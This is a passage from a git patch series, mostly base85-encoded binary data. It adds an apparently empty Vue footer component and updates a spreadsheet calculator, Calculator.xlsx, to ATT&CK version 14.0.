zfharv%_V&MO>_Gy>b~$98JEUfGbG=)!Eu5p*u73+6ikARPv2GeARuMBwgkCVaS6Iy
z8GB3MnKgkpT1rHVWrdtu4w(%=5_!LaNhe?0CiXx6@YfY-zl<~rKe
zNXA~QbWZ=r!;IxDNLX&YTR7pH>$dkB-U5@>s5hTc9fDgeC66gpXV;rItxHiEQ#zS-
zU4Z6d<8X@aY3WG=vbsI}XSDs&^g(BCniB<$IHK(2Wl@fAkZsjR{;4ukll0G~;R46X
zkynjN0>^0wqcxtJ!bZ9X)!+GR$JY+Cs_4;>CN|V9Wb-+#B;M!af2kBuo_DvfthcHO
zp+?V%#Lexm_qn4X1beA5IyZ2SjAvvi4RdoaA%okoNMP{U?LvkffqzxDOv9#qz*5X{
z9jz)Hs;dgpq%ENvEWYMgG`VWF3jR@^y>c~1n5$}G*0^&ZFvz&~IbrTp6SQQm+!0z&
z$iAtc^7ZX{2EXh2PxOJ+@Xn8g#Iupp3omBl(4$LmwnF;WRe{~^Ksf{sQ3|B!y~yCh
zHyLk8xs4Stio88ELX7Wh`mmBEIU
z+pei?vuqmb3%2fK`tS=CkUbGuA2~WG>=Ap{S~D|34kmP*-8@O~{F5!`Ds$y^ZFW+w
zKHRB-I;t0Ah(hc%P0$XQa+W*Qyezx<14T$r9Le4fMA@w9iZC#hzik{}{D+HI;kP~3!q@cfxF!|8Jx+k>OC@PSDICOPV*nN2_7?J&4ldi?>kP?>W@_NSi)TzDN1&EVZ#@rcHdYPtlNcb8z+Q_<}p7Yu|
zkYz2}?3O1VH>q<-QT2L{OzBlc&U0y9q)BEpqen@dr_~ErGCS04E6?XmiH0e5dPLqW(dk~
zR%-!5DioMQ>KE>!SDyU6<&m9)krgdY#VxjmiT$vSRlSY95|wS$S%t>lcL+0oNt?%{
z*eSB((X3a;!ls}(nW@RcC7uY!7c^x`=k}WRNtM9_(eb!Tjk}BUlSc#(C%d15^0_>}
zw`SVAmcp?;%nifW@mGa{37^0kc=FTbG2ebOSK=Q5+Cir^9u6#f43nN-B1hC|
zEDr1wlZIVaW7zLLVDmF~egXJGmZtkGV@l)d|Zo
z!R?DiwoIH)#>A1V(P^@Wiw#8tDHD`Hu4&*-A?TU6VCk4MrIs(sznl_
z{`ue&U$%rw^tee^Jr^@Epzvbw=X?W>0JRbi7*fQ^I7w%W*Hc7r_84lNAE88QBfic$
z_V>_Wkk?M;+m+Jgvw<#H7}r-s%sU)d&l6an4qC1a{(}Ep(M;t3E0=3~cJ250ZP}Mb
zJkxb#^_oQL$Pf_Mi53A4J8@nd!>YG4mE4udLMD
zbxPSvb95KU11BJg2h5F)!J69~1O_McWg6wY!#0N!tKy?^zR-Tu*OjvznDN@r%jz(-
zJ_2FC+aLI6eLbEPBvg>XBB(Mlj!MBsX6Tfzf&>&w!Q^u+R(C~doz(na%zn~`n*S6j
znFa4Bj{%>SXX@RPXX5aI#|Bx?+?8T6z&r88f3~l5R?c8+o;ZvNUdG$zL@yNG*q932
zU$akq`1WIi`F2I3sx5mBmi+tgZxEbCJ0q2J|02`L#6GKRs&`IJpL4wq9dbFveFS-o
zAruwGZ&oK48;{6&*Jrp6!5-9B2Bn26IVhZaMbtaO(cg>7{5D07^Elm6;VnHVu|;%C
zjOmr!qopglq=sNu}}Nrt6UAI0-9KOs-1G8yKZxDI1JiV8}o^hSD4jKPLMkq?T=Ini_%+r;tI2xmp6ih(d3qF?KH*@u`b5ELXsqctxl*M
z_r~C%8%V9g?PhXn$^W=B4c&c*j^3}#4d*)A92(${atYj&yAFAivt|x(O)iT3`$|~d
z&d8f{L)M06T^tYL-QQcY$%~m=N*EXsmTD-`C#odllCHD+}faZ@>5tH%)-{A~CzL
zw(J>=HQsJ=A{(;v**ExSA{8>s!|@y^xQA-D;;x6(*GF-_CNLY7LPzom(miTTi71$o
zrVvAoSsqM1J}k&Zo$MRmSZnz>4ssZYx5R)8{IqV+(>47$`kWB?_j#-Sj{I+P;qQpe
ztF!0pMS}k-kKbFYROky8wMYMT3_`{q;q}{(j9h1tXO)
z@VZUEtM7{NIPN#|xwdg|=h=!N`#;X}xqmfS8*(Z!pSbq43rR?t|B`wJtM%Jn)iJ>1
zoIdLiGFc_8O8;F0t*R<}S=Bh^S_0dIH(TUC(eZP9`mC~awOQHn74Ml4ErKJkvNl;=
z%9?A>&t+9;3QV}>^`f7frSzM4*(^A#c1K*m&Y9zk6!Wis@s90E{m$Wzb{c_#p6174
zm%`qv7D#5s2SLBhD{5}XP{o?&8qLz4>b$Z&%Sn2=7t*Qrqt!W9#VduN}3M{(}v+&FxarW}fRglOk4P
zs_1@o5Gg;X%PP1$1yHC}Z%#C9w$yu%+vcu}mA~$gE7^LS_D%A+lw&OUgxl56nz5v8
zW5MOkHvTXAtPcZ=@G+nE)K0P~9%X1L%-*CQfsp32{v+xOiKh$4dy`2G5fKLKcu`w_
z=3t(~^2C@14Zf2ic*TYgg33Yt$o0^S%*FGKhG68(M3T
z7aBA+DN{=#)^ni3_S$OVbk2Ew{R@1@SiDQ?-G=${wy*785q+so9+Ior$vLVuPMC^PlMk17&CJ6{T|f
z9Z9_hpGHsN#|>^qq!L@)Pzhhj3l-ioj&(Ml*)jKqUH-t%ggJ&##9iti{;*@|!KV>o
z#94&M$%nSZ{EMkzGw=J4^9DaIs<5rjPC>}V(XC(Nd&);o?Y}9cHIFqhEN^WJ0poFo
zrIcqN`W12EYrZr>8cIoCjD{@(-eX2jxD(flws`kZdjA+>a>eAgW3N9H#74*Iu+Pa=
z&Ty=k*QVQ@&$5DO=0D7k%Udz9YnyrJ?ch}Azj$lleN5%`9Ha~7+b@aS=QJnV5g02`
zYtpj2iv1C^{%3#gT-Rm7mr6g+cTbjkdLa+;_65>n)hN882BEN`eQ}`%zJa2rPvf$>
zDHsq5lY1C57M+3z_?|8evSl@!WdTbqniQa*bUEh+?Wv9*VRCBcnl20Zk*a|PgBE>6
z{mB24iJ*?6GADU_fp=Re7XeXYt**i$u&65z)KPgQv9Q7L%5RrL+<)wiz~%-T0~qnx
z1n6oshx~gcpr&u|vJ}^FLDgskL~WV30V(z!5O80g#LjFJda&N!Erb14aT`Xgi1)9*
zq-A_qTX?}0rEB7iNA*^zr}Kv8$>lL+bqy=xF36vdU{!$sQ>vOLj@yVMR#a}9fcIY0
zjHf|UMW&^M!R*EeI(2n%+aA7DzuUFXYFMi2!Aw`n)ZfzOj)Q*%vz-)@@wt|m)oLsK
zY3^daxHLWk{gXMrg-0yWh8^%k9ztljAFcnv5R-$hsH6_2)B!;sxon;
zK{@G;_(i!3L8OF{ZKlsm5IMW1qeQXRs4^$gX#=}Yq>MCMp?<+|(R>@Rmcl|S(qQrQ
zrO+-<=xUYtC{xP1;mXBIN>ZHJtOAlT;m)x0e-zjUtq?3-J$4l%F|tYs=Ei^IBqr$A
z2uPWgQ+WL;xuE%(&|sJ23c9PyxFEB1n$>zT_R_^y{o;g5jNOao)NX|3+kmdBXe5*b@nZz`s$+2)xr5?C@sUDV*F$#s7Tv6sZ2P
z%Syvk!l5)g-jbZ_0-q8hpl*>!yn8z@v6X_WoA9;1H7cb54JqtKzrzDD$)ytORW<}`
z^4RdAYjnkTaP85s=I3Ku67|!>di#qaM|brmfg}b>(u|x
zjw@t9Or-$&gx8j@>*!*xWx6ZQ;9*=4E+G?0aMx!h23_*uWI4W-!hbbK>li$s|(gJwdu?YZ1=`-
zT#=pGs5LKspXEDaFRM?s`aS5wOwxpFo|T&Lp@{BBcCqpmyw8#
z@w2_<#v91tU(1)pL>CZGr^4r7wsRrf4MF81?vNo{$ty)#@07Qqi5#YE7Y$rv+WNiP
zgT4{=twOHGJ$XdV8+#?_2C;)`^v%1Tl1EC5X<@~XWUe?JgQ?{iKwSXj^(a=}CbnE!|h*$WB
z9vOBr=o`{ls)8=@gkd}S~j`UQ5zgTQi
zdT7G>|CDeYj!^&qAL;6>`r4vUXP1nu>`^#p?+_W8XPuF373mYz9nKzw%(IWnP9L0g
z^1+=Iamc!}mHB(?_Yb_s>-~Pcp3moFeQUA)ae=BCtuMAb>7&23K~~^QurNwg9neiJqFnR&
zNKqo!ikvxg9{8bId7-M8B#F~PQ;f3`c%!8*wTsUPsu{-7DQi#f?yMUWL6p&m!;*VF
z{8Q0Kg!5J0jJ%5XN?jXBW4|V0;C#tgPMD#aC$+kjLzy!8kfrC>r;(0HSJZ{qJ+P1U
z4xQmXM(-I!=@M(B?1lXh%77TEjBS!iJClFCuy1B-IT#FW%WFY$y8NhZvbtaD9jXnN
zODX3oFZl6@w=8mS%z;>x*}wIjMA<{;9w&)N;Ga;WLvy|u^USObUYfrND*5oOLoL@SBmZ)D73H385VV*WSdr
zU%Fl{HL+m?>QGsP`sKpsqb?{xg4b*y78KuMvTE39fJMBIoiO?gY74
za{zKJ{{S1F)9@#{zC|X*?IOU;yuHC>URl88f-M9t^NT&sxg+%27-!(Ld3*hv^hS^M
zrobZ!Mx7Yv4c8mL-6wKy?%PkXS@IhB{CzwOi$vEfgYxr!l=Wn|SWs16o0b`ft;~(|
z;X6<|Hq}23uv|P6zVQ4q_pSK0fmqyddcx`(KCXUplboSmeTJ{R3_*kok?(M;d0+&72vJ^yi)udLs;YQ@hUPdBqU@eC|k=d
zr6Ccgc1oFlv7vGRvs%6%2XAFh8LcrX8Ta>0rQNoePh$^eONAHOLhE+-0gpM7p8zc@vB~~cV=l=*53kr(&k)||x}-E-UM?Bvv(U6z
zY;fSm;;X8}^kf4Nif#`40s3hthnv}JvehJdV1@)Bu{7ZJ1deifJ|yqyfWOwf$%BP{
ze7UcvrFC0?pxawHsJWVsz3O+@+A=U}0G@7(;z~}row7{uTkXnW9HpMOSv?VcI7rouskFveWn;l>zxfZ-Cf4v?
zIZg3BJ}lecm&WP~N^~vLBBgR&=cUKUy?XcSt`%)DgS=(}nwHu*H$Ct5-I>Kx!E$=M
z;+WjRmU}>E2TmRy1uf=f9?m{cX`1elT@+|08}-ipX|
zAFc_==8w3~=K3%+9hY~NkXX8K95xdk;Hmq(Xz0&hn7qD{ah3a(Xmjx8k|EtiZ@`U0zBCq{h+7iflaz4`alG|xgP-*rW5Xbt~B
z2%{JEozumVGaRUE&Ghg%<65?_+khT&nX#wg5)*v~H|p75*CVfCQ_vtFT%_BjWs6<1Kea#psQ?QnWw*?Ci|9LN2xvYPJs9Ldzlv4Q
z0eF>;jSOWLmHIpP(;C#%STe0>q}c1AWWix-J34uiE5pOq))CH3ZcQftj#t4t%G&6w
z4V1v5t)cZ+fsfVsnMVShttwQ+TR-Q*GL4Fo9I#E8!|@Z&n_;h09|3S_mcGg8t1wIg
zQ!gN&weSI7y2RMC!F*%U-Q}XFh>V(iZehFXK?@~v@+H^GQ38yjK>O1Kam8aOd#!Z7
z1v+&{)JIr)1%NGy8R25%q!EnPD5~8r*$qE+JF}y@AEEp(@2k90CP5l3X}-kW@>bGf
z;tR_C?Y^uQLIRbsus4PBj%F8AlTj&)^Wp@x^=-8t-Z(Ei`E6ZDE#khdf<)Ju;vb`^
z?%Hd8ZdWI|Uqoc!iz^|~>q8aYt9Cil=_vjqSS=+Sc1SOaT2tGVqk3V|Nlv@29e%ik1!mWCJ-@R7@cW}H$YGR8$9v%}?>MXnEUi*S
z@}kyxH*WC_sM0kU2W})^xFnx^PJzBv`EVD#Hrr_UEX`%^%jzj>-ThQ3^UChx;f+h&
z-fd#^D(>!-Bw=TWf<1Hq*GPwwU3B+?VPb#w9pWCw+Fq%X1^YNaWfI}T{w%AuOYiC_
zb#2=>%aW#FND?<&kB>{9Cd2*r1!J^ub#$L6FL?78
zh}6B$#Vwr;?Are}g33RM3M~t#Hq3$fgQg09wjPAsD|Hbj70W0EQIurVSGlBCKpj0g
zeNxRbQ&xX4>(
z=bgY{B?I!oC@G$sHTid!=O&N;jhq^zDhxoT8r|WR|dp1<3JKtq(1LEtkZ&>e9GvF>6`qqDr2IcOc;QIk6nD5$>G`rj|!6GxBKf2{}bC5zc{>
z?s&E^M|2!d&kcy@ic9~7wl%{)5|qMia#l}TL1g*82ns?_Ni=x6(HgTUZK*dPy|^of
zow=?^50xvcDs-JRAs&qz-AP(O2^6i0HrIS5`j#5HC5NNnB
z!v%@I)26%+U+{FkAM2H|;`t8cID!GI|kn&k#GW-__S|1VMqdnN5
zQA-w^{gdvlq_C5=JZ`}lQd!}Oz1ODm$uYuR^=yg7(i3F0m+p6C%*GJ8(4O0B0c>F!
z=?WP~9$(qmYs6M&gS|&4bPPdBZuwa*o}(Ep?UII<+x|EGpeF@W_3iK)7@j$lK@d$10gkHN8$$M*FlSZ{zu7bXXu%?p9m34Z867mlTZRemY@TZ30Sn%uI@_Z@ek#*g>w!1;=-mI`(er9%s4
zBE;UhVBa-LRU1UzBb!*v!7dCOW>a}J$d`$O8Q3a6_{k@w_TNzv_U8d^G&SioZtGwz
zuHsK5to_qcJ+CG>FQN6B_M|P(hC>tA0raSfPD%D?M%~73=4hOO942UIK`Yw-a57Du
zQOyq}%l2;!W8E7IW$v@90>47=SuPwXB&T)$Z99n!$&{=AT%nL9mQIva**flaT1a!l
zcUkKTs-RQgpzkBlz5|Z6X?az2vDxeWkE*EOM*xW`<+VKgH@)fGJyUToPnVXku0dEk
zM$bz_h%L`iR+V*4Hhd4=U9tLvks&B&f>?*d7WoM=_=?rA2;>KMPW45;2Zw0<2U&nG
zXFjW9^r)9YZTW(~s8NSGsI2QOIWMs*9TB6;EcBy2*FChGrO>Qq`a7d}cESvI3ZI+f
zyMyyG&U@Xf|9z>B>3-DLk*e|@M+Q6t)nt`?J9fU35<0Z_#lU-LNPI5+>VTJNt`d!w
zL=9mxb}Z$xhsCdF<35A)S?nre0=S>40b2i41323XoxR{rJag4`a0!*cS9{jh=6i4P
zd+F650cw$tP2y&2uDD|X_7Ui3brjHMjzuK=+#Vu9GF3a_w}RE+e6QpVtwSlE86r2w
zxlw_KnJ4e8;S#|#CRS#7v4xIPI2m!+!z6y@(P
z5n?5s%$MkZJgc2GEPIPYWB5>LV!nW-%Ewc)sC(G&6PTdT>MEBD9jKI@#
ztA!NT*jS~JVW2iTc7B=cxQloKvqMKmqf$PVFW$F17MP!g40BrWp4(c5
zd^+i#y{z_h!;p3Lb4K>31{Fdea|N{sz7n|iA?Nl;UlDUDTX=H{1}}~K>AV=1#+hNw
z?>Vi0o|{NhSbIAtuPTQ=%D{HZ41dI@=LBx*W+EY;TEUKUe|}rHk{OWOrw2hBpRC=Y
zNrYE?BlATt)nB{r;U!3PGSdGl44(Zw8e)zB+kA$RPhn=-*vCba#>wE-r`e}=PhFf)
zg$N0b*DzkBxxeCKh?qlN?;MXQe)dcVK$OKh$XL05m*qErX#}W+MV_5@%03YPKXpt|
z2u2KLG4cc!!@)BCYQ0kdU6{j%e7kQ|9mkR0q29z#Lv|8AnYZY)uRBER+$B5RqJ23l
z!~O2F-d9Hv=(9=aaQ2+bV=U6fWyvVQpe+HL5-uDpWNKdYle3&XQ=Y61f_tz`6$K?J
zwU=T&PxutUA!yBZ(zCkUf0C9f{~iWnset_T8fs4Jy{6%61zc8?zxU|lu7drbjHIdi
zl&${5JT@4`$IZ-Bpyw?FkUVd@#^Kr@-d;XQ+gf#W@=S7Zxujqw@^dOSXIOtEgf57p
zxnoz2c8}42%FW&c&%{NULlj8}qeio$pV_a*;=5t~)m$=*wGL3?I+@h{>>+mzp>&1o
z4Cz$!en#E*#Qs>H#l-jMzon2{ff17ZaHljo5m)n$8^apBN+D@q0^i~49ozC$(XDjR
zRE@YUBaqxvC)qTX$pw7-=z%24tbZW4zwwx9SM>^R*S(ts#Zmg>=piUZHf(kw=3w^6
zmu0icx1zWcYTrr09pe5-{UR|rJnO&@LyM$dHG3QNx6Z1qNf-h{gYo~Uui
zlAzW#gKrOPOg+`C(6IF-KJg{UqOk(IVf}E);3sfXX|TUBH+6ir&&?Nq+aetwE%GL>
zb#QqDI&YqgppjT>&r04?H;j9s3Q~*M1Ck%}NDH&9ht^md_%G`!Mv7}EnOY6C9W6@fN`Oa6B*
z?8r?_bUe7V<~^s_=|pKx4W0!+D2h}fzL@ai>Bw{My}=ccdZ#C^}
z3ie3ikH6D>CB&{863YgjAW}O7uQpfWqQ4Jq{^D!G768vZaI*NsKj%oBSY_eUu)dIwRZQQ=#$5K^8F@=6wUMaK!T-==yjX+i8kUF>_;G2
z;9lsouHr*=+D4DjIoVL@%gJ3Y-7{

literal 0
HcmV?d00001

diff --git a/src/components/NavigationFooter.vue b/src/components/NavigationFooter.vue
new file mode 100644
index 0000000..0049d9d
--- /dev/null
+++ b/src/components/NavigationFooter.vue
@@ -0,0 +1,92 @@
+
+
+
+
+
\ No newline at end of file

From b1aae840009d26c58957e5440361003578d94768 Mon Sep 17 00:00:00 2001
From: jlasky2 <118202061+jlasky2@users.noreply.github.com>
Date: Mon, 10 Jun 2024 10:45:50 -0700
Subject: [PATCH 12/21] TAT(114): Updated calculator sheets to ATTCK version
 14.0

---
 Calculator.xlsx | Bin 755028 -> 800330 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)

diff --git a/Calculator.xlsx b/Calculator.xlsx
index 5d013edabd4e62b845c1271f6eb6261e776ee2aa..e599ad200ac50327f4df407387440eb6fae63064 100644
GIT binary patch
literal 800330
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
